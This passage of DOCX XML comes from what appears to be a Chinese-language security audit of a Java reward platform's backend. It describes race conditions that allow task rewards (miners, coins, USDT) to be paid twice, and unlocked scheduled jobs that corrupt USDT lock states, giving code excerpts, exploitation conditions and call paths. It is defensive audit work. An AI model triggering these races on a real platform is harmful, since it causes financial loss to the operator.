              <w:t xml:space="preserve">        int newProgress = (...userTaskRecord.getCurrentProgress()...) + delta; // ← T1/T2 均读到同一旧值</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userTaskRecord.setCurrentProgress(newProgress);</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userTaskRecord.setStatus(1);</w:t>
              <w:br/>
              <w:br/>
              <w:t xml:space="preserve">        if (newProgress &gt;= targetProgress) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">            userTaskRecord.setStatus(2);</w:t>
              <w:br/>
              <w:t xml:space="preserve">            userTaskRecord.setCompleteTime(LocalDateTime.now());</w:t>
              <w:br/>
              <w:t xml:space="preserve">            applyReward(userId, task.getId()); // ← 漏洞点：T1 和 T2 均执行到此，双重发奖</w:t>
              <w:br/>
              <w:t xml:space="preserve">        }</w:t>
              <w:br/>
              <w:t xml:space="preserve">        userTaskRecordRepository.save(userTaskRecord); // ← T2 覆盖写入，掩盖了双重发奖痕迹</w:t>
              <w:br/>
              <w:t xml:space="preserve">    }</w:t>
              <w:br/>
              <w:t>}</w:t>
              <w:br/>
              <w:br/>
              <w:t>// ③ 每日任务分支（对比参考）——开发者已正确实现幂等，但非每日分支未跟进：</w:t>
              <w:br/>
              <w:t>if (hasReachTarget &amp;&amp; !awardIssued) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">    try {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        dailyTaskAwardIssuedRepository.save(</w:t>
              <w:br/>
              <w:t xml:space="preserve">            new DailyTaskAwardIssued(userId, taskId, today)); // ← 唯一约束，并发时只有一个成功</w:t>
              <w:br/>
              <w:t xml:space="preserve">        applyReward(userId, task.getId());</w:t>
              <w:br/>
              <w:t xml:space="preserve">    } catch (DataIntegrityViolationException e) {</w:t>
              <w:br/>
              <w:t xml:space="preserve">        // 并发重复插入，其他事务已发奖，忽略 ← 正确的幂等保护</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缺陷定性（无需 HTTP POC，属于并发设计缺陷）：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对比维度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每日任务分支（taskType=1）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非每日任务分支（taskType≠1）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发奖前幂等写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先 INSERT 唯一约束记录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无任何防重保护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并发安全机制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DataIntegrityViolationException 捕获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仅乐观状态检查，非原子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行级锁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N/A（独立幂等表）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无 SELECT FOR UPDATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>利用条件：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1374"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">应用以多实例（集群）方式部署，每个实例均运行各自的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Scheduled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 任务；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1375"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">或存在其他调用路径并发触发同一用户同一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>triggerCondition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>updateProgress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1376"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两个并发事务的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>findByUserIdAndTaskId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 均在对方提交 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>status=2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 之前执行（高并发下默认 READ COMMITTED 隔离级别不能阻止此窗口）。</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 xml:space="preserve"> 同一 S 级/限定任务奖励被重复发放，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>rewardApplyService.apply()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 多次执行，用户获得 2× 乃至更多倍的矿机/金币/USDT 奖励，平台承担超额资产损失。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>⚠️ 权限要求：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1377"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是否需要登录：否（由服务端定时任务触发，无需用户主动请求）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1378"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>权限级别：无需特殊权限，仅需多实例部署或存在并发触发场景即可</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379"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UserScheduler.java.userKycVerifiedTask → TaskExecutionService.java.updateProgress → TaskExecutionService.java.applyReward → TaskRewardConfig.java.getMinerLevel</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audit_m267_1177_userKycVerifiedTask_ctrl-path4of29.md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：UserScheduler.java#refreshInviterUsdtConfigByKycAndDeposit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:name="heading_65" w:id="65"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞64：定时任务缺乏分布式锁且 USDT 锁进度刷新非原子，多节点并发下奖池解锁状态不可靠</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1380"/>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：定时任务缺分布式锁 + USDT 锁进度非事务刷新导致并发竞态</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1381"/>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src/main/java/com/gameBack/mjservice/scheduler/UserScheduler.java:refreshInviterUsdtConfigByKycAndDeposit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1382"/>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：资金安全 / 并发竞态（TOCTOU）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1383"/>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384"/>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：无需主动操作，多节点部署下自然触发</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1385"/>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等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>该定时任务存在两层并发安全缺陷，共同作用于 USDT 奖池锁的完成状态写入：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>缺陷一：`@Scheduled` 任务无分布式锁</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>userKycVerifiedTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@Scheduled(fixedRate = 10 * 60 * 1000L)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 注解，但没有任何分布式锁机制（如 ShedLock 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>@SchedulerLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">）。在多实例部署（多节点集群）下，所有节点将在同一时间点各自独立地查询 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>isKycVerified=0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的用户批次，并对相同的用户同时执行处理逻辑，导致以下操作被重复触发 N 次（N = 节点数）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1386"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>shareService.shareLevel3Success(inviterUserId, user.getId())</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1387"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>refreshInviterUsdtConfigByKycAndDeposit(inviterUserId)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1388"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>InviterStarRecord</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的"先查后存"（check-then-create）逻辑：两节点同时发现记录不存在，均创建并保存，产生重复记录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>缺陷二：`refreshInviterUsdtConfigByKycAndDeposit` 缺乏 `@Transactional` 且无行级锁</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">该方法先从数据库读取计数 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>remaining</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">，再在 for 循环中逐条更新 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>UsdtUserConfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">（每次 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>usdtUserConfigRepository.save(config)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 均是独立事务）。整个"读计数 → 计算分配 → 逐条写入"流程不具备原子性。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>在多节点并发场景下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1389"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">节点 A 读取 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>remaining=5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，开始逐条保存：lock1→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>completionStatus=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，lock2→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>completionStatus=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，lock3→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>completionStatus=0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1390"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">节点 B 同时（因另一被邀请人恰好也完成 KYC）读取 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>remaining=6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，逐条保存：lock1→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>completionStatus=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，lock2→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>completionStatus=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，lock3→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>completionStatus=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1391"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">两节点的 save 操作在数据库层面交错执行，最终写入顺序取决于 JVM 调度，lock3 的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>completionStatus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 可能被节点 A 的"=0"覆盖，而实际计数已经满足解锁条件（=1），造成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>应解锁而未解锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的状态</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">反向场景同样成立：当某一 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:shd w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>remaining</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 较大的并发写覆盖了已写入的正确状态，可导致锁被误标为"未完成"或"已完成"，直接影响邀请人是否能领取对应层级的 USDT 奖励。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1392"/>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ml:space="preserve">  多节点 @Scheduled 同时触发 userKycVerifiedTask</w:t>
              <w:br/>
              <w:t xml:space="preserve">      └→ [同一用户被多节点并发处理]</w:t>
              <w:br/>
              <w:t xml:space="preserve">          └→ refreshInviterUsdtConfigByKycAndDeposit(inviterUserId)</w:t>
              <w:br/>
              <w:t xml:space="preserve">              ├→ countInviteesWithKycAndHasTraded(inviterUserId)  // 各节点各自读，结果可能不同</w:t>
              <w:br/>
              <w:t xml:space="preserve">              ├→ findByUserIdOrderByLockLevelAsc(inviterUserId)   // 读出相同的 config 列表</w:t>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:ascii="Consolas" w:cs="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">              └→ for-loop: usdtUserConfigRepository.save(config)  // 各自独立事务逐条写，相互覆盖</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="1393"/>
        </w:numPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:b w:val="true"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>资金影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="等线" w:ascii="Arial" w:cs="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
